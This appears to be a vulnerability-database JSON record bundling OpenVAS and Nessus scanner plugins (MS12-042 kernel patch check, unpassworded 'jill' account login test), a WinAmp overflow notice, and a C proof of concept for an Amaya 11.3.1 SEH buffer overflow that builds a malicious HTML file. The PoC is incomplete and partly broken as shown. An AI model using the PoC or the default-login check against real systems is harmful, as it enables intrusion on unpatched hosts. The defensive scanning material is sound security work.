{"openvas": [{"lastseen": "2019-05-29T18:38:32", "bulletinFamily": "scanner", "description": "This host is missing an important security update according to\n Microsoft Bulletin MS12-042.", "modified": "2019-05-03T00:00:00", "published": "2012-06-13T00:00:00", "id": "OPENVAS:1361412562310902916", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902916", "title": "Microsoft Windows Kernel Privilege Elevation Vulnerabilities (2711167)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Kernel Privilege Elevation Vulnerabilities (2711167)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2012 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902916\");\n script_version(\"2019-05-03T12:31:27+0000\");\n script_cve_id(\"CVE-2012-0217\", \"CVE-2012-1515\");\n script_bugtraq_id(53856, 52820);\n script_tag(name:\"cvss_base\", value:\"8.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-03 12:31:27 +0000 (Fri, 03 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2012-06-13 09:21:39 +0530 (Wed, 13 Jun 2012)\");\n script_name(\"Microsoft Windows Kernel Privilege Elevation Vulnerabilities (2711167)\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/49454/\");\n script_xref(name:\"URL\", value:\"http://support.microsoft.com/kb/2707511\");\n script_xref(name:\"URL\", value:\"http://www.securitytracker.com/id/1027155\");\n script_xref(name:\"URL\", value:\"http://technet.microsoft.com/en-us/security/bulletin/ms12-042\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2012 SecPod\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation could allow remote attackers to execute arbitrary\n code with kernel-mode privileges.\");\n script_tag(name:\"affected\", value:\"Microsoft Windows 7 x64 Edition Service Pack 1 and prior\n Microsoft Windows XP x32 Edition Service Pack 3 and prior\n Microsoft Windows 2K3 x32 Edition Service Pack 2 and prior\n Microsoft Windows Server 2008 x64 Edition Service Pack 1 and prior\");\n script_tag(name:\"insight\", value:\"The flaws are due to an,\n\n - Error in the User Mode Scheduler (UMS) when handling a particular system\n request can be exploited to execute arbitrary code.\n\n - Error in incorrect protection of BIOS ROM can be exploited to execute\n arbitrary code.\");\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n script_tag(name:\"summary\", value:\"This host is missing an important security update according to\n Microsoft Bulletin MS12-042.\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(xp:4 ,win2003:3, win7x64:2, win2008r2:2) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_systemroot();\nif(!sysPath ){\n exit(0);\n}\n\nexeVer = fetch_file_version(sysPath:sysPath, file_name:\"system32\\ntoskrnl.exe\");\nif(!exeVer){\n exit(0);\n}\n\nif(hotfix_check_sp(xp:4) > 0)\n{\n if(version_is_less(version:exeVer, test_version:\"5.1.2600.6223\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n}\n\nelse if(hotfix_check_sp(win2003:3) > 0)\n{\n if(version_is_less(version:exeVer, test_version:\"5.2.3790.4998\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n}\n\nelse if(hotfix_check_sp(win7x64:2, win2008r2:2) > 0)\n{\n if(version_is_less(version:exeVer, test_version:\"6.1.7600.17017\") ||\n version_in_range(version:exeVer, test_version:\"6.1.7600.20000\", test_version2:\"6.1.7600.21206\")||\n version_in_range(version:exeVer, test_version:\"6.1.7601.17000\", test_version2:\"6.1.7601.17834\")||\n version_in_range(version:exeVer, test_version:\"6.1.7601.21000\", test_version2:\"6.1.7601.21986\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n}\n", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-02-05T03:15:45", "bulletinFamily": "exploit", "description": "Exploit for multiple platform in category dos / poc", "modified": "2010-05-21T00:00:00", "published": "2010-05-21T00:00:00", "id": "1337DAY-ID-12297", "href": "https://0day.today/exploit/description/12297", "type": "zdt", "title": "Amaya 11.3.1(dec 9 2009) remote buffer overflow (poc)", "sourceData": "=====================================================\r\nAmaya 11.3.1(dec 9 2009) remote buffer overflow (poc)\r\n=====================================================\r\n\r\n\r\n#include<stdio.h>\r\n/*Amaya 11.3.1(dec 9 2009) remote buffer overflow(poc)*/\r\n unsigned int seh=0x7C902783; ;\r\n char nseh[]=\"\\xeb\\x04\\x90\\x90\";\r\n void gen_random(char *s, const int len)\r\n { int i;\r\n static const char alphanum[] =\"0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz\";\r\n \r\n for(i=0;i<len;i++)\r\n {\r\n s[i]=alphanum[rand()%(sizeof(alphanum)-1)];\r\n }\r\n s[len]=0;\r\n }\r\n char html[]=\"<script defer=\\\"\";\r\n char end[]=\"\\\">\";\r\n int main(){\r\n FILE*f=fopen(\"shit.html\",\"wb\");\r\n char buffer[100000];\r\n fwrite(html,1,sizeof(html)-1,f);\r\n gen_random(buffer,12996);\r\n memcpy(buffer+11266,&seh,4);\r\n memcpy(buffer+11262,seh,4);\r\n memset(buffer+11266,0x90,10);\r\n memcpy(buffer+11276,calc,strlen(calc));\r\n fwrite(buffer,1,12996,f);\r\n \r\n fwrite(end,1,sizeof(end)-1,f);\r\n fclose(f);\r\n printf(\"done\");\r\n getchar();\r\n return 0;\r\n }\r\n\r\n\n\n# 0day.today [2018-02-05] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/12297"}], "securityvulns": [{"lastseen": "2018-08-31T11:09:20", "bulletinFamily": "software", "description": "Buffer overflow on oversized computer name in UNC path of .pls on .m3u file entry. Buffer overflow on oversized WMA playlist file entry.\r\nVulnerability can be exploited for hidden trojan installation.", "modified": "2006-02-25T00:00:00", "published": "2006-02-25T00:00:00", "id": "SECURITYVULNS:VULN:5711", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:5711", "title": "WinAmp player buffer overflow", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}], "nessus": [{"lastseen": "2019-11-01T02:12:10", "bulletinFamily": "scanner", "description": "The account ", "modified": "2019-11-02T00:00:00", "id": "ACCOUNT_JILL.NASL", "href": "https://www.tenable.com/plugins/nessus/11266", "published": "2003-02-20T00:00:00", "title": "Unpassworded 'jill' Account", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"jill\";\n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(11266);\n script_version (\"1.33\");\n script_cvs_date(\"Date: 2018/07/25 16:19:22\");\n\n script_cve_id(\"CVE-1999-0502\");\n \n script_name(english:\"Unpassworded 'jill' Account\");\n script_summary(english:\"Attempts to log in to the remote host.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has an account with no password set.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'jill' has no password set. An attacker may use this\nto gain further privileges on this system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Set a password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:TF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:T/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2003/02/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2001/01/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n \n script_copyright(english:\"This script is Copyright (C) 2003-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n \n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n\n exit(0);\n}\n\n#\n# The script code starts here : \n#\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude('global_settings.inc');\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}